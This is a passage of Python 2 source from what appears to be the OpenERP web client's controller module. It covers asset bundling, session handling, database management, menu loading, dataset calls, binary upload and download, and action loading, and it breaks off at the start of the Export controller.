def fs2web(path):
"""convert FS path into web path"""
return '/'.join(path.split(os.path.sep))
def manifest_glob(req, extension, addons=None, db=None):
if addons is None:
addons = module_boot(req, db=db)
else:
addons = addons.split(',')
r = []
for addon in addons:
manifest = openerpweb.addons_manifest.get(addon, None)
if not manifest:
continue
# ensure does not ends with /
addons_path = os.path.join(manifest['addons_path'], '')[:-1]
globlist = manifest.get(extension, [])
for pattern in globlist:
for path in glob.glob(os.path.normpath(os.path.join(addons_path, addon, pattern))):
r.append((path, fs2web(path[len(addons_path):])))
return r
def manifest_list(req, extension, mods=None, db=None):
""" list ressources to load specifying either:
mods: a comma separated string listing modules
db: a database name (return all installed modules in that database)
"""
if not req.debug:
path = '/web/webclient/' + extension
if mods is not None:
path += '?' + urllib.urlencode({'mods': mods})
elif db:
path += '?' + urllib.urlencode({'db': db})
return [path]
files = manifest_glob(req, extension, addons=mods, db=db)
return [wp for _fp, wp in files]
def get_last_modified(files):
""" Returns the modification time of the most recently modified
file provided
:param list(str) files: names of files to check
:return: most recent modification time amongst the fileset
:rtype: datetime.datetime
"""
files = list(files)
if files:
return max(datetime.datetime.fromtimestamp(os.path.getmtime(f))
for f in files)
return datetime.datetime(1970, 1, 1)
def make_conditional(req, response, last_modified=None, etag=None):
""" Makes the provided response conditional based upon the request,
and mandates revalidation from clients
Uses Werkzeug's own :meth:`ETagResponseMixin.make_conditional`, after
setting ``last_modified`` and ``etag`` correctly on the response object
:param req: OpenERP request
:type req: web.common.http.WebRequest
:param response: Werkzeug response
:type response: werkzeug.wrappers.Response
:param datetime.datetime last_modified: last modification date of the response content
:param str etag: some sort of checksum of the content (deep etag)
:return: the response object provided
:rtype: werkzeug.wrappers.Response
"""
response.cache_control.must_revalidate = True
response.cache_control.max_age = 0
if last_modified:
response.last_modified = last_modified
if etag:
response.set_etag(etag)
return response.make_conditional(req.httprequest)
def login_and_redirect(req, db, login, key, redirect_url='/'):
wsgienv = req.httprequest.environ
env = dict(
base_location=req.httprequest.url_root.rstrip('/'),
HTTP_HOST=wsgienv['HTTP_HOST'],
REMOTE_ADDR=wsgienv['REMOTE_ADDR'],
)
req.session.authenticate(db, login, key, env)
return set_cookie_and_redirect(req, redirect_url)
def set_cookie_and_redirect(req, redirect_url):
redirect = werkzeug.utils.redirect(redirect_url, 303)
redirect.autocorrect_location_header = False
cookie_val = urllib2.quote(simplejson.dumps(req.session_id))
redirect.set_cookie('instance0|session_id', cookie_val)
return redirect
def load_actions_from_ir_values(req, key, key2, models, meta):
Values = req.session.model('ir.values')
actions = Values.get(key, key2, models, meta, req.context)
return [(id, name, clean_action(req, action))
for id, name, action in actions]
def clean_action(req, action):
action.setdefault('flags', {})
action_type = action.setdefault('type', 'ir.actions.act_window_close')
if action_type == 'ir.actions.act_window':
return fix_view_modes(action)
return action
# I think generate_views,fix_view_modes should go into js ActionManager
def generate_views(action):
"""
While the server generates a sequence called "views" computing dependencies
between a bunch of stuff for views coming directly from the database
(the ``ir.actions.act_window model``), it's also possible for e.g. buttons
to return custom view dictionaries generated on the fly.
In that case, there is no ``views`` key available on the action.
Since the web client relies on ``action['views']``, generate it here from
``view_mode`` and ``view_id``.
Currently handles two different cases:
* no view_id, multiple view_mode
* single view_id, single view_mode
:param dict action: action descriptor dictionary to generate a views key for
"""
view_id = action.get('view_id') or False
if isinstance(view_id, (list, tuple)):
view_id = view_id[0]
# providing at least one view mode is a requirement, not an option
view_modes = action['view_mode'].split(',')
if len(view_modes) > 1:
if view_id:
raise ValueError('Non-db action dictionaries should provide '
'either multiple view modes or a single view '
'mode and an optional view id.\n\n Got view '
'modes %r and view id %r for action %r' % (
view_modes, view_id, action))
action['views'] = [(False, mode) for mode in view_modes]
return
action['views'] = [(view_id, view_modes[0])]
def fix_view_modes(action):
""" For historical reasons, OpenERP has weird dealings in relation to
view_mode and the view_type attribute (on window actions):
* one of the view modes is ``tree``, which stands for both list views
and tree views
* the choice is made by checking ``view_type``, which is either
``form`` for a list view or ``tree`` for an actual tree view
This methods simply folds the view_type into view_mode by adding a
new view mode ``list`` which is the result of the ``tree`` view_mode
in conjunction with the ``form`` view_type.
TODO: this should go into the doc, some kind of "peculiarities" section
:param dict action: an action descriptor
:returns: nothing, the action is modified in place
"""
if not action.get('views'):
generate_views(action)
if action.pop('view_type', 'form') != 'form':
return action
if 'view_mode' in action:
action['view_mode'] = ','.join(
mode if mode != 'tree' else 'list'
for mode in action['view_mode'].split(','))
action['views'] = [
[id, mode if mode != 'tree' else 'list']
for id, mode in action['views']
]
return action
def _local_web_translations(trans_file):
messages = []
try:
with open(trans_file) as t_file:
po = babel.messages.pofile.read_po(t_file)
except Exception:
return
for x in po:
if x.id and x.string and "openerp-web" in x.auto_comments:
messages.append({'id': x.id, 'string': x.string})
return messages
def xml2json_from_elementtree(el, preserve_whitespaces=False):
""" xml2json-direct
Simple and straightforward XML-to-JSON converter in Python
New BSD Licensed
http://code.google.com/p/xml2json-direct/
"""
res = {}
if el.tag[0] == "{":
ns, name = el.tag.rsplit("}", 1)
res["tag"] = name
res["namespace"] = ns[1:]
else:
res["tag"] = el.tag
res["attrs"] = {}
for k, v in el.items():
res["attrs"][k] = v
kids = []
if el.text and (preserve_whitespaces or el.text.strip() != ''):
kids.append(el.text)
for kid in el:
kids.append(xml2json_from_elementtree(kid, preserve_whitespaces))
if kid.tail and (preserve_whitespaces or kid.tail.strip() != ''):
kids.append(kid.tail)
res["children"] = kids
return res
def content_disposition(filename, req):
filename = ustr(filename)
escaped = urllib2.quote(filename.encode('utf8'))
browser = req.httprequest.user_agent.browser
version = int((req.httprequest.user_agent.version or '0').split('.')[0])
if browser == 'msie' and version < 9:
return "attachment; filename=%s" % escaped
elif browser == 'safari':
return u"attachment; filename=%s" % filename
else:
return "attachment; filename*=UTF-8''%s" % escaped
#----------------------------------------------------------
# OpenERP Web web Controllers
#----------------------------------------------------------
html_template = """<!DOCTYPE html>
<html style="height: 100%%">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>OpenERP</title>
<link rel="shortcut icon" href="/web/static/src/img/favicon.ico" type="image/x-icon"/>
<link rel="stylesheet" href="/web/static/src/css/full.css" />
%(css)s
%(js)s
<script type="text/javascript">
$(function() {
var s = new openerp.init(%(modules)s);
%(init)s
});
</script>
</head>
<body>
<!--[if lte IE 8]>
<script src="//ajax.googleapis.com/ajax/libs/chrome-frame/1/CFInstall.min.js"></script>
<script>CFInstall.check({mode: "overlay"});</script>
<![endif]-->
</body>
</html>
"""
class Home(openerpweb.Controller):
_cp_path = '/'
@openerpweb.httprequest
def index(self, req, s_action=None, db=None, **kw):
db, redir = db_monodb_redirect(req)
if redir:
return redirect_with_hash(req, redir)
js = "\n ".join('<script type="text/javascript" src="%s"></script>' % i for i in manifest_list(req, 'js', db=db))
css = "\n ".join('<link rel="stylesheet" href="%s">' % i for i in manifest_list(req, 'css', db=db))
r = html_template % {
'js': js,
'css': css,
'modules': simplejson.dumps(module_boot(req, db=db)),
'init': 'var wc = new s.web.WebClient();wc.appendTo($(document.body));'
}
return r
@openerpweb.httprequest
def login(self, req, db, login, key):
if db not in db_list(req, True):
return werkzeug.utils.redirect('/', 303)
return login_and_redirect(req, db, login, key)
class WebClient(openerpweb.Controller):
_cp_path = "/web/webclient"
@openerpweb.jsonrequest
def csslist(self, req, mods=None):
return manifest_list(req, 'css', mods=mods)
@openerpweb.jsonrequest
def jslist(self, req, mods=None):
return manifest_list(req, 'js', mods=mods)
@openerpweb.jsonrequest
def qweblist(self, req, mods=None):
return manifest_list(req, 'qweb', mods=mods)
@openerpweb.httprequest
def css(self, req, mods=None, db=None):
files = list(manifest_glob(req, 'css', addons=mods, db=db))
last_modified = get_last_modified(f[0] for f in files)
if req.httprequest.if_modified_since and req.httprequest.if_modified_since >= last_modified:
return werkzeug.wrappers.Response(status=304)
file_map = dict(files)
rx_import = re.compile(r"""@import\s+('|")(?!'|"|/|https?://)""", re.U)
rx_url = re.compile(r"""url\s*\(\s*('|"|)(?!'|"|/|https?://|data:)""", re.U)
def reader(f):
"""read the a css file and absolutify all relative uris"""
with open(f, 'rb') as fp:
data = fp.read().decode('utf-8')
path = file_map[f]
web_dir = os.path.dirname(path)
data = re.sub(
rx_import,
r"""@import \1%s/""" % (web_dir,),
data,
)
data = re.sub(
rx_url,
r"""url(\1%s/""" % (web_dir,),
data,
)
return data.encode('utf-8')
content, checksum = concat_files((f[0] for f in files), reader)
# move up all @import and @charset rules to the top
matches = []
def push(matchobj):
matches.append(matchobj.group(0))
return ''
content = re.sub(re.compile("(@charset.+;$)", re.M), push, content)
content = re.sub(re.compile("(@import.+;$)", re.M), push, content)
matches.append(content)
content = '\n'.join(matches)
return make_conditional(
req, req.make_response(content, [('Content-Type', 'text/css')]),
last_modified, checksum)
@openerpweb.httprequest
def js(self, req, mods=None, db=None):
files = [f[0] for f in manifest_glob(req, 'js', addons=mods, db=db)]
last_modified = get_last_modified(files)
if req.httprequest.if_modified_since and req.httprequest.if_modified_since >= last_modified:
return werkzeug.wrappers.Response(status=304)
content, checksum = concat_js(files)
return make_conditional(
req, req.make_response(content, [('Content-Type', 'application/javascript')]),
last_modified, checksum)
@openerpweb.httprequest
def qweb(self, req, mods=None, db=None):
files = [f[0] for f in manifest_glob(req, 'qweb', addons=mods, db=db)]
last_modified = get_last_modified(files)
if req.httprequest.if_modified_since and req.httprequest.if_modified_since >= last_modified:
return werkzeug.wrappers.Response(status=304)
content, checksum = concat_xml(files)
return make_conditional(
req, req.make_response(content, [('Content-Type', 'text/xml')]),
last_modified, checksum)
@openerpweb.jsonrequest
def bootstrap_translations(self, req, mods):
""" Load local translations from *.po files, as a temporary solution
until we have established a valid session. This is meant only
for translating the login page and db management chrome, using
the browser's language. """
# For performance reasons we only load a single translation, so for
# sub-languages (that should only be partially translated) we load the
# main language PO instead - that should be enough for the login screen.
lang = req.lang.split('_')[0]
translations_per_module = {}
for addon_name in mods:
if openerpweb.addons_manifest[addon_name].get('bootstrap'):
addons_path = openerpweb.addons_manifest[addon_name]['addons_path']
f_name = os.path.join(addons_path, addon_name, "i18n", lang + ".po")
if not os.path.exists(f_name):
continue
translations_per_module[addon_name] = {'messages': _local_web_translations(f_name)}
return {"modules": translations_per_module,
"lang_parameters": None}
@openerpweb.jsonrequest
def translations(self, req, mods, lang):
res_lang = req.session.model('res.lang')
ids = res_lang.search([("code", "=", lang)])
lang_params = None
if ids:
lang_params = res_lang.read(ids[0], ["direction", "date_format", "time_format",
"grouping", "decimal_point", "thousands_sep"])
# Regional languages (ll_CC) must inherit/override their parent lang (ll), but this is
# done server-side when the language is loaded, so we only need to load the user's lang.
ir_translation = req.session.model('ir.translation')
translations_per_module = {}
messages = ir_translation.search_read([('module','in',mods),('lang','=',lang),
('comments','like','openerp-web'),('value','!=',False),
('value','!=','')],
['module','src','value','lang'], order='module')
for mod, msg_group in itertools.groupby(messages, key=operator.itemgetter('module')):
translations_per_module.setdefault(mod,{'messages':[]})
translations_per_module[mod]['messages'].extend({'id': m['src'],
'string': m['value']} \
for m in msg_group)
return {"modules": translations_per_module,
"lang_parameters": lang_params}
@openerpweb.jsonrequest
def version_info(self, req):
return openerp.service.web_services.RPC_VERSION_1
class Proxy(openerpweb.Controller):
_cp_path = '/web/proxy'
@openerpweb.jsonrequest
def load(self, req, path):
""" Proxies an HTTP request through a JSON request.
It is strongly recommended to not request binary files through this,
as the result will be a binary data blob as well.
:param req: OpenERP request
:param path: actual request path
:return: file content
"""
from werkzeug.test import Client
from werkzeug.wrappers import BaseResponse
return Client(req.httprequest.app, BaseResponse).get(path).data
class Database(openerpweb.Controller):
_cp_path = "/web/database"
@openerpweb.jsonrequest
def get_list(self, req):
# TODO change js to avoid calling this method if in monodb mode
try:
return db_list(req)
except xmlrpclib.Fault:
monodb = db_monodb(req)
if monodb:
return [monodb]
raise
@openerpweb.jsonrequest
def create(self, req, fields):
params = dict(map(operator.itemgetter('name', 'value'), fields))
return req.session.proxy("db").create_database(
params['super_admin_pwd'],
params['db_name'],
bool(params.get('demo_data')),
params['db_lang'],
params['create_admin_pwd'])
@openerpweb.jsonrequest
def duplicate(self, req, fields):
params = dict(map(operator.itemgetter('name', 'value'), fields))
duplicate_attrs = (
params['super_admin_pwd'],
params['db_original_name'],
params['db_name'],
)
return req.session.proxy("db").duplicate_database(*duplicate_attrs)
@openerpweb.jsonrequest
def drop(self, req, fields):
password, db = operator.itemgetter(
'drop_pwd', 'drop_db')(
dict(map(operator.itemgetter('name', 'value'), fields)))
try:
if req.session.proxy("db").drop(password, db):return True
except xmlrpclib.Fault, e:
if e.faultCode and e.faultCode.split(':')[0] == 'AccessDenied':
return {'error': e.faultCode, 'title': 'Drop Database'}
return {'error': _('Could not drop database !'), 'title': _('Drop Database')}
@openerpweb.httprequest
def backup(self, req, backup_db, backup_pwd, token):
try:
db_dump = base64.b64decode(
req.session.proxy("db").dump(backup_pwd, backup_db))
filename = "%(db)s_%(timestamp)s.dump" % {
'db': backup_db,
'timestamp': datetime.datetime.utcnow().strftime(
"%Y-%m-%d_%H-%M-%SZ")
}
return req.make_response(db_dump,
[('Content-Type', 'application/octet-stream; charset=binary'),
('Content-Disposition', content_disposition(filename, req))],
{'fileToken': token}
)
except xmlrpclib.Fault, e:
return simplejson.dumps([[],[{'error': e.faultCode, 'title': _('Backup Database')}]])
@openerpweb.httprequest
def restore(self, req, db_file, restore_pwd, new_db):
try:
data = base64.b64encode(db_file.read())
req.session.proxy("db").restore(restore_pwd, new_db, data)
return ''
except xmlrpclib.Fault, e:
if e.faultCode and e.faultCode.split(':')[0] == 'AccessDenied':
raise Exception("AccessDenied")
@openerpweb.jsonrequest
def change_password(self, req, fields):
old_password, new_password = operator.itemgetter(
'old_pwd', 'new_pwd')(
dict(map(operator.itemgetter('name', 'value'), fields)))
try:
return req.session.proxy("db").change_admin_password(old_password, new_password)
except xmlrpclib.Fault, e:
if e.faultCode and e.faultCode.split(':')[0] == 'AccessDenied':
return {'error': e.faultCode, 'title': _('Change Password')}
return {'error': _('Error, password not changed !'), 'title': _('Change Password')}
class Session(openerpweb.Controller):
_cp_path = "/web/session"
def session_info(self, req):
req.session.ensure_valid()
return {
"session_id": req.session_id,
"uid": req.session._uid,
"user_context": req.session.get_context() if req.session._uid else {},
"db": req.session._db,
"username": req.session._login,
}
@openerpweb.jsonrequest
def get_session_info(self, req):
return self.session_info(req)
@openerpweb.jsonrequest
def authenticate(self, req, db, login, password, base_location=None):
wsgienv = req.httprequest.environ
env = dict(
base_location=base_location,
HTTP_HOST=wsgienv['HTTP_HOST'],
REMOTE_ADDR=wsgienv['REMOTE_ADDR'],
)
req.session.authenticate(db, login, password, env)
return self.session_info(req)
@openerpweb.jsonrequest
def change_password (self,req,fields):
old_password, new_password,confirm_password = operator.itemgetter('old_pwd', 'new_password','confirm_pwd')(
dict(map(operator.itemgetter('name', 'value'), fields)))
if not (old_password.strip() and new_password.strip() and confirm_password.strip()):
return {'error':_('You cannot leave any password empty.'),'title': _('Change Password')}
if new_password != confirm_password:
return {'error': _('The new password and its confirmation must be identical.'),'title': _('Change Password')}
try:
if req.session.model('res.users').change_password(
old_password, new_password):
return {'new_password':new_password}
except Exception:
return {'error': _('The old password you provided is incorrect, your password was not changed.'), 'title': _('Change Password')}
return {'error': _('Error, password not changed !'), 'title': _('Change Password')}
@openerpweb.jsonrequest
def sc_list(self, req):
return req.session.model('ir.ui.view_sc').get_sc(
req.session._uid, "ir.ui.menu", req.context)
@openerpweb.jsonrequest
def get_lang_list(self, req):
try:
return req.session.proxy("db").list_lang() or []
except Exception, e:
return {"error": e, "title": _("Languages")}
@openerpweb.jsonrequest
def modules(self, req):
# return all installed modules. Web client is smart enough to not load a module twice
return module_installed(req)
@openerpweb.jsonrequest
def save_session_action(self, req, the_action):
"""
This method store an action object in the session object and returns an integer
identifying that action. The method get_session_action() can be used to get
back the action.
:param the_action: The action to save in the session.
:type the_action: anything
:return: A key identifying the saved action.
:rtype: integer
"""
saved_actions = req.httpsession.get('saved_actions')
if not saved_actions:
saved_actions = {"next":1, "actions":{}}
req.httpsession['saved_actions'] = saved_actions
# we don't allow more than 10 stored actions
if len(saved_actions["actions"]) >= 10:
del saved_actions["actions"][min(saved_actions["actions"])]
key = saved_actions["next"]
saved_actions["actions"][key] = the_action
saved_actions["next"] = key + 1
return key
@openerpweb.jsonrequest
def get_session_action(self, req, key):
"""
Gets back a previously saved action. This method can return None if the action
was saved since too much time (this case should be handled in a smart way).
:param key: The key given by save_session_action()
:type key: integer
:return: The saved action or None.
:rtype: anything
"""
saved_actions = req.httpsession.get('saved_actions')
if not saved_actions:
return None
return saved_actions["actions"].get(key)
@openerpweb.jsonrequest
def check(self, req):
req.session.assert_valid()
return None
@openerpweb.jsonrequest
def destroy(self, req):
req.session._suicide = True
class Menu(openerpweb.Controller):
_cp_path = "/web/menu"
@openerpweb.jsonrequest
def get_user_roots(self, req):
""" Return all root menu ids visible for the session user.
:param req: A request object, with an OpenERP session attribute
:type req: < session -> OpenERPSession >
:return: the root menu ids
:rtype: list(int)
"""
s = req.session
Menus = s.model('ir.ui.menu')
# If a menu action is defined use its domain to get the root menu items
user_menu_id = s.model('res.users').read([s._uid], ['menu_id'],
req.context)[0]['menu_id']
menu_domain = [('parent_id', '=', False)]
if user_menu_id:
domain_string = s.model('ir.actions.act_window').read(
[user_menu_id[0]], ['domain'],req.context)[0]['domain']
if domain_string:
menu_domain = ast.literal_eval(domain_string)
return Menus.search(menu_domain, 0, False, False, req.context)
@openerpweb.jsonrequest
def load(self, req):
""" Loads all menu items (all applications and their sub-menus).
:param req: A request object, with an OpenERP session attribute
:type req: < session -> OpenERPSession >
:return: the menu root
:rtype: dict('children': menu_nodes)
"""
Menus = req.session.model('ir.ui.menu')
fields = ['name', 'sequence', 'parent_id', 'action']
menu_root_ids = self.get_user_roots(req)
menu_roots = Menus.read(menu_root_ids, fields, req.context) if menu_root_ids else []
menu_root = {
'id': False,
'name': 'root',
'parent_id': [-1, ''],
'children': menu_roots,
'all_menu_ids': menu_root_ids,
}
if not menu_roots:
return menu_root
# menus are loaded fully unlike a regular tree view, cause there are a
# limited number of items (752 when all 6.1 addons are installed)
menu_ids = Menus.search([('id', 'child_of', menu_root_ids)], 0, False, False, req.context)
menu_items = Menus.read(menu_ids, fields, req.context)
# adds roots at the end of the sequence, so that they will overwrite
# equivalent menu items from full menu read when put into id:item
# mapping, resulting in children being correctly set on the roots.
menu_items.extend(menu_roots)
menu_root['all_menu_ids'] = menu_ids # includes menu_root_ids!
# make a tree using parent_id
menu_items_map = dict(
(menu_item["id"], menu_item) for menu_item in menu_items)
for menu_item in menu_items:
if menu_item['parent_id']:
parent = menu_item['parent_id'][0]
else:
parent = False
if parent in menu_items_map:
menu_items_map[parent].setdefault(
'children', []).append(menu_item)
# sort by sequence a tree using parent_id
for menu_item in menu_items:
menu_item.setdefault('children', []).sort(
key=operator.itemgetter('sequence'))
return menu_root
@openerpweb.jsonrequest
def load_needaction(self, req, menu_ids):
""" Loads needaction counters for specific menu ids.
:return: needaction data
:rtype: dict(menu_id: {'needaction_enabled': boolean, 'needaction_counter': int})
"""
return req.session.model('ir.ui.menu').get_needaction_data(menu_ids, req.context)
@openerpweb.jsonrequest
def action(self, req, menu_id):
# still used by web_shortcut
actions = load_actions_from_ir_values(req,'action', 'tree_but_open',
[('ir.ui.menu', menu_id)], False)
return {"action": actions}
class DataSet(openerpweb.Controller):
_cp_path = "/web/dataset"
@openerpweb.jsonrequest
def search_read(self, req, model, fields=False, offset=0, limit=False, domain=None, sort=None):
return self.do_search_read(req, model, fields, offset, limit, domain, sort)
def do_search_read(self, req, model, fields=False, offset=0, limit=False, domain=None
, sort=None):
""" Performs a search() followed by a read() (if needed) using the
provided search criteria
:param req: a JSON-RPC request object
:type req: openerpweb.JsonRequest
:param str model: the name of the model to search on
:param fields: a list of the fields to return in the result records
:type fields: [str]
:param int offset: from which index should the results start being returned
:param int limit: the maximum number of records to return
:param list domain: the search domain for the query
:param list sort: sorting directives
:returns: A structure (dict) with two keys: ids (all the ids matching
the (domain, context) pair) and records (paginated records
matching fields selection set)
:rtype: list
"""
Model = req.session.model(model)
ids = Model.search(domain, offset or 0, limit or False, sort or False,
req.context)
if limit and len(ids) == limit:
length = Model.search_count(domain, req.context)
else:
length = len(ids) + (offset or 0)
if fields and fields == ['id']:
# shortcut read if we only want the ids
return {
'length': length,
'records': [{'id': id} for id in ids]
}
records = Model.read(ids, fields or False, req.context)
index = dict((r['id'], r) for r in records)
records = [index[x] for x in ids if x in index]
return {
'length': length,
'records': records
}
@openerpweb.jsonrequest
def load(self, req, model, id, fields):
m = req.session.model(model)
value = {}
r = m.read([id], False, req.context)
if r:
value = r[0]
return {'value': value}
def call_common(self, req, model, method, args, domain_id=None, context_id=None):
return self._call_kw(req, model, method, args, {})
def _call_kw(self, req, model, method, args, kwargs):
# Temporary implements future display_name special field for model#read()
if method in ('read', 'search_read') and kwargs.get('context', {}).get('future_display_name'):
if 'display_name' in args[1]:
if method == 'read':
names = dict(req.session.model(model).name_get(args[0], **kwargs))
else:
names = dict(req.session.model(model).name_search('', args[0], **kwargs))
args[1].remove('display_name')
records = getattr(req.session.model(model), method)(*args, **kwargs)
for record in records:
record['display_name'] = \
names.get(record['id']) or "%s#%d" % (model, (record['id']))
return records
return getattr(req.session.model(model), method)(*args, **kwargs)
@openerpweb.jsonrequest
def call(self, req, model, method, args, domain_id=None, context_id=None):
return self._call_kw(req, model, method, args, {})
@openerpweb.jsonrequest
def call_kw(self, req, model, method, args, kwargs):
return self._call_kw(req, model, method, args, kwargs)
@openerpweb.jsonrequest
def call_button(self, req, model, method, args, domain_id=None, context_id=None):
action = self._call_kw(req, model, method, args, {})
if isinstance(action, dict) and action.get('type') != '':
return clean_action(req, action)
return False
@openerpweb.jsonrequest
def exec_workflow(self, req, model, id, signal):
return req.session.exec_workflow(model, id, signal)
@openerpweb.jsonrequest
def resequence(self, req, model, ids, field='sequence', offset=0):
""" Re-sequences a number of records in the model, by their ids
The re-sequencing starts at the first model of ``ids``, the sequence
number is incremented by one after each record and starts at ``offset``
:param ids: identifiers of the records to resequence, in the new sequence order
:type ids: list(id)
:param str field: field used for sequence specification, defaults to
"sequence"
:param int offset: sequence number for first record in ``ids``, allows
starting the resequencing from an arbitrary number,
defaults to ``0``
"""
m = req.session.model(model)
if not m.fields_get([field]):
return False
# python 2.6 has no start parameter
for i, id in enumerate(ids):
m.write(id, { field: i + offset })
return True
class View(openerpweb.Controller):
_cp_path = "/web/view"
@openerpweb.jsonrequest
def add_custom(self, req, view_id, arch):
CustomView = req.session.model('ir.ui.view.custom')
CustomView.create({
'user_id': req.session._uid,
'ref_id': view_id,
'arch': arch
}, req.context)
return {'result': True}
@openerpweb.jsonrequest
def undo_custom(self, req, view_id, reset=False):
CustomView = req.session.model('ir.ui.view.custom')
vcustom = CustomView.search([('user_id', '=', req.session._uid), ('ref_id' ,'=', view_id)],
0, False, False, req.context)
if vcustom:
if reset:
CustomView.unlink(vcustom, req.context)
else:
CustomView.unlink([vcustom[0]], req.context)
return {'result': True}
return {'result': False}
class TreeView(View):
_cp_path = "/web/treeview"
@openerpweb.jsonrequest
def action(self, req, model, id):
return load_actions_from_ir_values(
req,'action', 'tree_but_open',[(model, id)],
False)
class Binary(openerpweb.Controller):
_cp_path = "/web/binary"
@openerpweb.httprequest
def image(self, req, model, id, field, **kw):
last_update = '__last_update'
Model = req.session.model(model)
headers = [('Content-Type', 'image/png')]
etag = req.httprequest.headers.get('If-None-Match')
hashed_session = hashlib.md5(req.session_id).hexdigest()
id = None if not id else simplejson.loads(id)
if type(id) is list:
id = id[0] # m2o
if etag:
if not id and hashed_session == etag:
return werkzeug.wrappers.Response(status=304)
else:
date = Model.read([id], [last_update], req.context)[0].get(last_update)
if hashlib.md5(date).hexdigest() == etag:
return werkzeug.wrappers.Response(status=304)
retag = hashed_session
try:
if not id:
res = Model.default_get([field], req.context).get(field)
image_base64 = res
else:
res = Model.read([id], [last_update, field], req.context)[0]
retag = hashlib.md5(res.get(last_update)).hexdigest()
image_base64 = res.get(field)
if kw.get('resize'):
resize = kw.get('resize').split(',')
if len(resize) == 2 and int(resize[0]) and int(resize[1]):
width = int(resize[0])
height = int(resize[1])
# resize maximum 500*500
if width > 500: width = 500
if height > 500: height = 500
image_base64 = openerp.tools.image_resize_image(base64_source=image_base64, size=(width, height), encoding='base64', filetype='PNG')
image_data = base64.b64decode(image_base64)
except (TypeError, xmlrpclib.Fault):
image_data = self.placeholder(req)
headers.append(('ETag', retag))
headers.append(('Content-Length', len(image_data)))
try:
ncache = int(kw.get('cache'))
headers.append(('Cache-Control', 'no-cache' if ncache == 0 else 'max-age=%s' % (ncache)))
except:
pass
return req.make_response(image_data, headers)
def placeholder(self, req, image='placeholder.png'):
addons_path = openerpweb.addons_manifest['web']['addons_path']
return open(os.path.join(addons_path, 'web', 'static', 'src', 'img', image), 'rb').read()
@openerpweb.httprequest
def saveas(self, req, model, field, id=None, filename_field=None, **kw):
""" Download link for files stored as binary fields.
If the ``id`` parameter is omitted, fetches the default value for the
binary field (via ``default_get``), otherwise fetches the field for
that precise record.
:param req: OpenERP request
:type req: :class:`web.common.http.HttpRequest`
:param str model: name of the model to fetch the binary from
:param str field: binary field
:param str id: id of the record from which to fetch the binary
:param str filename_field: field holding the file's name, if any
:returns: :class:`werkzeug.wrappers.Response`
"""
Model = req.session.model(model)
fields = [field]
content_type = 'application/octet-stream'
if filename_field:
fields.append(filename_field)
if id:
fields.append('file_type')
res = Model.read([int(id)], fields, req.context)[0]
if res.get('file_type'):
content_type = res['file_type']
else:
res = Model.default_get(fields, req.context)
filecontent = base64.b64decode(res.get(field, ''))
if not filecontent:
return req.not_found()
else:
filename = '%s_%s' % (model.replace('.', '_'), id)
if filename_field:
filename = res.get(filename_field, '') or filename
return req.make_response(
filecontent, [('Content-Type', content_type),
('Content-Disposition',
content_disposition(filename, req))])
@openerpweb.httprequest
def saveas_ajax(self, req, data, token):
jdata = simplejson.loads(data)
model = jdata['model']
field = jdata['field']
data = jdata['data']
id = jdata.get('id', None)
filename_field = jdata.get('filename_field', None)
context = jdata.get('context', {})
content_type = 'application/octet-stream'
Model = req.session.model(model)
fields = [field]
if filename_field:
fields.append(filename_field)
if data:
res = {field: data, filename_field: jdata.get('filename', None)}
elif id:
fields.append('file_type')
res = Model.read([int(id)], fields, context)[0]
if res.get('file_type'):
content_type = res['file_type']
else:
res = Model.default_get(fields, context)
filecontent = base64.b64decode(res.get(field, ''))
if not filecontent:
raise ValueError(_("No content found for field '%s' on '%s:%s'") %
(field, model, id))
else:
filename = '%s_%s' % (model.replace('.', '_'), id)
if filename_field:
filename = res.get(filename_field, '') or filename
return req.make_response(
filecontent, headers=[('Content-Type', content_type),
('Content-Disposition',
content_disposition(filename, req))],
cookies={'fileToken': token})
@openerpweb.httprequest
def upload(self, req, callback, ufile):
# TODO: might be useful to have a configuration flag for max-length file uploads
out = """<script language="javascript" type="text/javascript">
var win = window.top.window;
win.jQuery(win).trigger(%s, %s);
</script>"""
try:
data = ufile.read()
args = [len(data), ufile.filename,
ufile.content_type, base64.b64encode(data)]
except Exception, e:
args = [False, e.message]
return out % (simplejson.dumps(callback), simplejson.dumps(args))
@openerpweb.httprequest
def upload_attachment(self, req, callback, model, id, ufile):
Model = req.session.model('ir.attachment')
out = """<script language="javascript" type="text/javascript">
var win = window.top.window;
win.jQuery(win).trigger(%s, %s);
</script>"""
try:
attachment_id = Model.create({
'name': ufile.filename,
'datas': base64.encodestring(ufile.read()),
'datas_fname': ufile.filename,
'res_model': model,
'res_id': int(id)
}, req.context)
args = {
'filename': ufile.filename,
'id': attachment_id
}
except xmlrpclib.Fault, e:
args = {'error':e.faultCode }
return out % (simplejson.dumps(callback), simplejson.dumps(args))
@openerpweb.httprequest
def company_logo(self, req, dbname=None):
# TODO add etag, refactor to use /image code for etag
uid = None
if req.session._db:
dbname = req.session._db
uid = req.session._uid
elif dbname is None:
dbname = db_monodb(req)
if not uid:
uid = openerp.SUPERUSER_ID
if not dbname:
image_data = self.placeholder(req, 'logo.png')
else:
try:
# create an empty registry
registry = openerp.modules.registry.Registry(dbname)
with registry.cursor() as cr:
cr.execute("""SELECT c.logo_web
FROM res_users u
LEFT JOIN res_company c
ON c.id = u.company_id
WHERE u.id = %s
""", (uid,))
row = cr.fetchone()
if row and row[0]:
image_data = str(row[0]).decode('base64')
else:
image_data = self.placeholder(req, 'nologo.png')
except Exception:
image_data = self.placeholder(req, 'logo.png')
headers = [
('Content-Type', 'image/png'),
('Content-Length', len(image_data)),
]
return req.make_response(image_data, headers)
class Action(openerpweb.Controller):
_cp_path = "/web/action"
@openerpweb.jsonrequest
def load(self, req, action_id, do_not_eval=False):
Actions = req.session.model('ir.actions.actions')
value = False
try:
action_id = int(action_id)
except ValueError:
try:
module, xmlid = action_id.split('.', 1)
model, action_id = req.session.model('ir.model.data').get_object_reference(module, xmlid)
assert model.startswith('ir.actions.')
except Exception:
action_id = 0 # force failed read
base_action = Actions.read([action_id], ['type'], req.context)
if base_action:
ctx = {}
action_type = base_action[0]['type']
if action_type == 'ir.actions.report.xml':
ctx.update({'bin_size': True})
ctx.update(req.context)
action = req.session.model(action_type).read([action_id], False, ctx)
if action:
value = clean_action(req, action[0])
return value
@openerpweb.jsonrequest
def run(self, req, action_id):
return_action = req.session.model('ir.actions.server').run(
[action_id], req.context)
if return_action:
return clean_action(req, return_action)
else:
return False
class Export(openerpweb.Controller):
_cp_path = "/web/export"
@openerpweb.jsonrequest
def formats(self, req):
